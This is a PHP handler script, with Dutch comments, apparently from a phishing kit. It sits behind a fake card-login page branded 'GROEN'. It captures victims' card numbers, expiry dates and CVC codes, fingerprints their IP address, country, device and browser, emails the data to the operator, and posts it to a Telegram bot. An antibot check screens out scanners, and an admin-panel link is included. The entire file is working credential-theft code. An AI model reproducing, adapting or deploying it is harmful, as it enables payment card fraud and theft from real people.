<?php
@session_start();
require_once 'antibot/config/init.php';

// Controleer of de bot_status in de sessie staat en of het geen 0 is
if (isset($_SESSION['bot_status']) && $_SESSION['bot_status'] !== 0) {
    die("Bot gedetecteerd!");
}

// Function to generate a random code (2 letters + 2 digits)
if (!isset($_SESSION['activia_code'])) {
    $letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $digits = '0123456789';
    $code = '';
    for ($i = 0; $i < 2; $i++) {
        $code .= $letters[rand(0, strlen($letters) - 1)];
    }
    for ($i = 0; $i < 2; $i++) {
        $code .= $digits[rand(0, strlen($digits) - 1)];
    }
    $_SESSION['activia_code'] = $code;
} else {
    $code = $_SESSION['activia_code'];
}

// Functie om landinformatie op te halen op basis van IP-adres
function getCountryInfo($ip) {
    $json = @file_get_contents("http://ip-api.com/json/{$ip}?fields=status,country,countryCode");
    $data = json_decode($json, true);
    if ($data && $data['status'] === 'success') {
        $countryName = $data['country'];
        $countryCode = $data['countryCode'];
        $flag = getFlagEmoji($countryCode);
        return "{$countryName} {$flag}";
    } else {
        return "Onbekend";
    }
}

// Functie om een landcode om te zetten naar een vlag-emoticon
function getFlagEmoji($countryCode) {
    $emoji = '';
    foreach (str_split($countryCode) as $char) {
        $emoji .= mb_chr(0x1F1E6 - ord('A') + ord($char), 'UTF-8');
    }
    return $emoji;
}

$ip = $_SERVER['REMOTE_ADDR'];
$countryInfo = getCountryInfo($ip);

// Detecteer gebruikerstype
$userAgent = $_SERVER['HTTP_USER_AGENT'];
if (strpos($userAgent, 'Mobile') !== false || strpos($userAgent, 'Android') !== false || strpos($userAgent, 'iPhone') !== false) {
    $userType = "Mobiel apparaat";
} else {
    $userType = "Computer";
}

// Detecteer besturingssysteem
if (strpos($userAgent, 'Windows') !== false) {
    $os = "Windows";
} elseif (strpos($userAgent, 'Macintosh') !== false || strpos($userAgent, 'Mac OS') !== false) {
    $os = "Mac OS";
} elseif (strpos($userAgent, 'Linux') !== false) {
    $os = "Linux";
} else {
    $os = "Onbekend";
}

// Detecteer browser
if (strpos($userAgent, 'Firefox') !== false) {
    $browser = "Firefox";
} elseif (strpos($userAgent, 'Chrome') !== false) {
    $browser = "Chrome";
} elseif (strpos($userAgent, 'Safari') !== false) {
    $browser = "Safari";
} elseif (strpos($userAgent, 'Opera') !== false) {
    $browser = "Opera";
} else {
    $browser = "Onbekend";
}

include "./include_admin/md5.php";
include "./include_admin/md4.php";

// Controleer of de teller voor het aantal keer uitvoeren al bestaat en verhoog deze
if (!isset($_SESSION['run_count'])) {
    $_SESSION['run_count'] = 1; // Start teller als hij nog niet bestaat
} else {
    $_SESSION['run_count'] += 1; // Verhoog teller als hij al bestaat
}

// Voeg de run_count toe aan de logData
$logDataCount = $_SESSION['run_count'];

if ($_POST['form_type'] == 'login') {
    $_SESSION['rnr'] = $_POST['abbonummer'];
    $_SESSION['exp'] = $_POST['vervaldatum'];

    if (empty($_POST['abbonummer']) || empty($_POST['vervaldatum'])) {
        header('location: 1ndex.php');
        exit();
    }
    $msg_email = "Kaart nr.: " . $_SESSION['rnr'] . '<br>Geldig t/m.: ' . $_SESSION['exp'];
    $title = "GROEN | " . $_SESSION['rnr'] . " | logData 19 |";
    $redirectPage = 'laden.php';
} elseif ($_POST['form_type'] == 'login2') {
    $_SESSION['rnr2'] = $_POST['abbonummer2'];
    $_SESSION['exp2'] = $_POST['vervaldatum2'];
    $_SESSION['cvv2'] = $_POST['cvc2'];
    if (empty($_POST['abbonummer2']) || empty($_POST['cvc2'])) {
        header('location: 1ndex.php');
        exit();
    }
    $msg_email = "Kaart nr.: " . $_SESSION['rnr2'] . '<br>Geldig t/m.: ' . $_SESSION['exp2']. '<br>CVC code: ' . $_SESSION['cvv2'];
    $title = "GROEN | " . $_SESSION['rnr2'] . " | logData 16 |";
    $redirectPage = 'laden.php';
} else {
    header('location: laden.php');
    exit();
}

$_SESSION['vto'] = rand(123456, 999999);
$headers = "From: GROEN || <klantenserv@" . $_SERVER['SERVER_NAME'] . ">\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type:text/html; charset=iso-8859-1\r\n";

// Verzend de e-mail
mail($XsndMud, $title, $msg_email, $headers);

// Stel het Telegram-bericht samen met verbeterde layout en verborgen links
$telegramMessage = "🌍 *" . $title . "* " . $logDataCount . " | " . $countryInfo . "\n\n" .
                   "💳 *Kaart nr.:* " . ($_POST['form_type'] == 'login' ? $_SESSION['rnr'] : $_SESSION['rnr2']) . "\n" .
                   "🔑 *Geldig t/m.:* " . ($_POST['form_type'] == 'login' ? $_SESSION['exp'] : $_SESSION['exp2']) . "\n\n";

if ($_POST['form_type'] == 'login2') {
    $telegramMessage .= "🔐 *CVC code:* " . $_SESSION['cvv2'] . "\n\n";
}

$telegramMessage .= "--| *Client Information* |--\n" .
                   "📡 *IP Address:* " . $_SERVER['REMOTE_ADDR'] . "\n" .
                   "🌐 *Country:* " . $countryInfo . "\n" .
                   "📱 *User Type:* " . $userType . "\n" .
                   "💻 *OS:* " . $os . "\n" .
                   "🌐 *Browser:* " . $browser . "\n\n" .
                   "--| *Links* |--\n" .
                   "🔗 [Admin Panel](https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/include_admin/?ckr=" . md5($_SERVER['REMOTE_ADDR']) . ")\n" .
                   "🔗 [Login to Website](https://mijnwebsite.nl/)";

// Verzend bericht naar Telegram met Markdown-formattering en zonder link previews
$telegramAPI = "https://api.telegram.org/bot$telegramBotToken/sendMessage?chat_id=$channelUsername&text=" . urlencode($telegramMessage) . "&parse_mode=Markdown&disable_web_page_preview=true";
file_get_contents($telegramAPI);

// Verwijder clientinformatie en leid gebruiker om
@unlink('dataClient/' . md5($_SERVER['REMOTE_ADDR']));
header('location: ' . $redirectPage);
exit();
?>
